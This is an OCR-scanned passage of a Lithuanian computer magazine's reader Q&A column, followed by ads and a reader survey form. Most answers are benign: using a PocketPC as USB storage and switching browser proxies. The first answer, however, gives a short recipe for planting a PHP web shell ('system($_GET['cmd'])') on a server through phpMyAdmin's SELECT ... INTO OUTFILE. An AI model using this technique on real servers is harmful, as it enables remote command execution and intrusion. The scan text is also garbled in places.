das. Galbūt galėtumei pasiūlyti kokį nors tolimesnių 


Pradžiai būtų gerai perprasti phpMyAdmin. Kaip žinia, 

tai populiarus (tačiau tuo pačiu toli gražu ne pats pato- 

giausias) MySOL duomenų bazių valdymo skriptas. Tuo 

galima pasinaudoti, tačiau tik su viena sąlyga: tu turi rasti 
katalogą, į kurį turi teises rašyti, beje, jis turi būti Document- 
Root ribose (t.y. prieinamas per www). Toliau viskas paprasta. 
Bazėje sukuriama lentelė su vienu lauku, kuriame įrašoma 
iki skausmo pažįstama eilutė: <?system($ GET['cmd'|)?>. 
Sukurtos lentelės lauko išvestą informaciją išsaugome i bylą. 
Tam suformuojame gudrią SOL užklausą: SELECT <vienintelio 
lentelės lauko pavadinimas> FROM < lentelės pavadinimas> 
INTO OUTFILE „Kelias iki katalogo su rašymo teisėmis/file.php'. 
Štai tau Ir web shellas. 
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PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIR- 
TAS „HACK-FAG“, TAIP PAT NEV- 
ERTA UŽDAVINĖTI AKIVAIZDŽIAI 
LAMERIŠKŲ KLAUSIMŲ, ATSAKY- 
MUS Į KURIUOS TURĖDAMAS BENT 


KIEK NORĖDAMAS GALI RASTI IR 
PATS. AŠ NE TELEPATAS, TODĖL 
KONKRETIZUOK KLAUSIMĄ IR 
ATSIŲSK KUO DAUGIAU INFORMA- 
CIJOS. 


to, kai pamečiau trečią USB atminties kortelę iš 

eilės, savo mažąjį draugą pradėjau naudoti ir kaip 

konteinerį duomenų pernešimui. Tačiau susidūriau 
su problema: jeigu namie su prisijungimu neiškyla jokių 
problemų (ten įdiegtas ActiveSync), tai, pavyzdžiui, uni- 
versitete šiuo atžvilgiu tenka patirti nesėkmę. Galbūt 
yra koks nors būdas, kaip iš mano delninuko padaryti 
paprasčiausią USB flash kortelę? 


Tai daroma visiškai lengvai. Tuo pasirūpino gudručiai iš 

kompanijos „Softtick“ (www.softick.com/cardexport2/). 

Įdiegus programą Card Export II, delninukas pradės 

emuliuoti USB Mass Storage, o prijungus prie kompiuter- 

io jis bus atpažįstamas kaip paprasčiausia flash atminties 
kortelė, Prijungei — ir naujas diskas tavo paslaugoms. Vietoje 
konteinerio galima primontuoti tiek flash, tiek ir įmontuotą PPC 
atmintį, ką pasirinkti galima per specialų programos meniu. 
Beje, yra ir PalmOS skirta šios programos versija. 


(O) Antrus metus naudoju PocketPC delninuką. Po 


Įdiegus programą „Card Export II“, delninukas pradės emuliuoti 
„USB Mass Storage“, o prijungus prie kompiuterio jis bus 
atpažįstamas kaip paprasčiausia „flash“ atminties kortelė. 
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Turiu problemą: proxy serveriai miršta kaip musės, 
o kaskart Iįsti į naršyklės nustatymus tikrai 
užknisa. Patark, kaip greitai persijungti tarp proxy 
serverių? 


Jeigu tu naudojiesi Internet Explorer'iu, patarsiu 
tik viena — pasikeisk naršyklę. Tegu tai būna Avant 


Browser (www.avantbrowser.com), kuri sukurta remian- 

tis to paties IE varikliuku. Tuo pačiu tu gausi galimybę 
greitai persijungti tarp proxy serverių, operatyviai išvalyti 
sausainukus ir istoriją. Atkakliems IE šalininkams ir tiems 
nelaimingiesiems, kurie prie kompiuterio sėdi biure galima 
pasiūlyti įdiegti papildymą — VDBand (www.myfreeware. 
narod.ru/products/VDBand.htm). Po įdiegimo naršyklės 
įrankių juostoje atsiras 4 nedideli simpatiški mygtukai. 
Dabar norint perjungti proxy, pakanka nuspausti mygtuką 
Proxy Server ir pasirinkti iš sąrašo pageidaujamą variantą 
(sąrašą reikia sukonfigūruoti iš anksto per Customize). Firefox 
vartotojams pasisekė kur kas labiau. Ne veltui ši naršyklė 
vadinama labiausiai plečiama — Jai gali rasti viską. Tokia 
smulkmena, kaip greitas persijungimas tarp proxy serverių, 
taip pat ne išimtis. Rekomenduoju papildymą SwitchProxy 
(http://extend.flock.com/details/switchproxy) . Visas įdiegimas 
susiveda į svetainėje pateikto mygtuko „INSTALL SwitchProxy“ 
paspaudimą. 
Universaliausias variantas, kuris tiks su bet kokia naršykle — pro- 
grama 44Proxy (www.inetprivacy.com/a4proxy). Iš esmės 
tai lokalus proxy serveris (tai reiškia, kad norint juo nau- 
dotis, naršyklės proxy serverio nustatymuose reikia įrašyti 
127.0.0.1 ir jungtį, per kurią veikia ši programa), tačiau jis 
turi daugybę ūkyje praversiančių galimybių. Proxy iš sąrašo 
galima pasirinkti tiek rankiniu būdu, tiek ir automatiškai. Su 
rankiniu konfigūravimu viskas aišku (pakanka kelių pelės 
paspaudimų), o automatinis proxy pasirinkimas iš viso atrodo 
prašmatniai. Programa pagal jai nurodytus kriterijus gali pati 
parinkti tinkamą serverį, remdamasi „švarumo“ patikrinimo 
rezultatais (tikrai taip, programa palaiko anonimiškumo 
patikrinimą). 
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Elitinio 
HAKERIŲ KLUBO 
nariams taikomos 


ELITE CLUB 


+004LA315b 


Interneto klube „IMPRESS“ 
su ELITE CLUB nario kortele 
suteikiama 20 96 nuolaida! 


ai | LITIMI: 


Mina | HAKERIŲ KLUBAS 


(HYPER MAXIMA) 


Savanorių pr. 66 BMS MEGAPOLIS, 
Tel.: (37) 75 10 10 Laisvės pr. 2 
El. paštas: kaunas(Obms.lt Tel.: (5) 24 77 300 


El. paštas: v.megapolis(0bms.lt 


Pateikus ELITE CLUB BMS MEGAPOLIS, 

kortelę visose BMS Savanorių pr.301 Minijos g. 2 

parduotuvėse suteikiama Tel.: (37) 313101 Tel.: (46) 38 33 33 

5 4 nuolaida. El. paštas: megapolisObms.lt El. paštas: klaipeda(0bms.lt 


Etal 
murmskinlaime ki 


Kitame numeryje norėčiau rasti: 


Vardas| | 
Pavardė 


Amžius | š| 
Adresas 


El.paštas | 
Tavo klausimas į FAO: 


Išvardink tris, tavo manymu, 
įdomiausius šio numerio straipsnius: 


ir tris prasčiausius: || 


Siųsti ||| išvalyti | 
"ANKETĄ SIŲSK ADRESU. | 


Naudojiesi kompiuteriu 


Ei metus 


Naudojiesi internetu 
(= metus 


Kiek žurnalo numerių skaitei? 
| numerius 


Kokią OS naudoji? 


36-0J0 NUMERIO 
NUGALĖTOJAS: 


TOMAS MAJAUSKAS 


IŠ PRIENŲ. 

JAM ATITENKA 

MICROSOFT WIRELESS 
OPTICAL KLAVIATŪRA IR PELĖ 


LAIMĖTOJO PRAŠOM 
PASKAMBINTI Į REDAKCIJĄ IR 
SUSITARTI DĖL PRIZO 
ATSIĖMIMO.. 


duoja || |) G) 


Pentium D 
inside 
IPERKANTIKOMPIUTERISUJIntelGĮPentiume]DIPROCESORIUM! 


54cm 


VISIŠKAI 
PLOKŠČIAS 


„M 


Garantija 


Kaina 1999 Lt - 33 = 


INTEL LOGO, INTEL INSIDE, INTEL INSIDE LOGO, INTEL PENTIUMENINIEL, CENTRINC 
ARKA OR REBISTERED TRADEMARKS OF INTEL CORH 


BILIETO KAINA 1 Lt + sms siuntimo kaina O,20 Lt 


Rašyk SMS: OHO ir 3 skaičius iš 12 (pvz.: 040 2 11 9) 
siųsk SMS 1606 ir netrukus gausi loterijos bilietą. 


www.oholotto.lt 


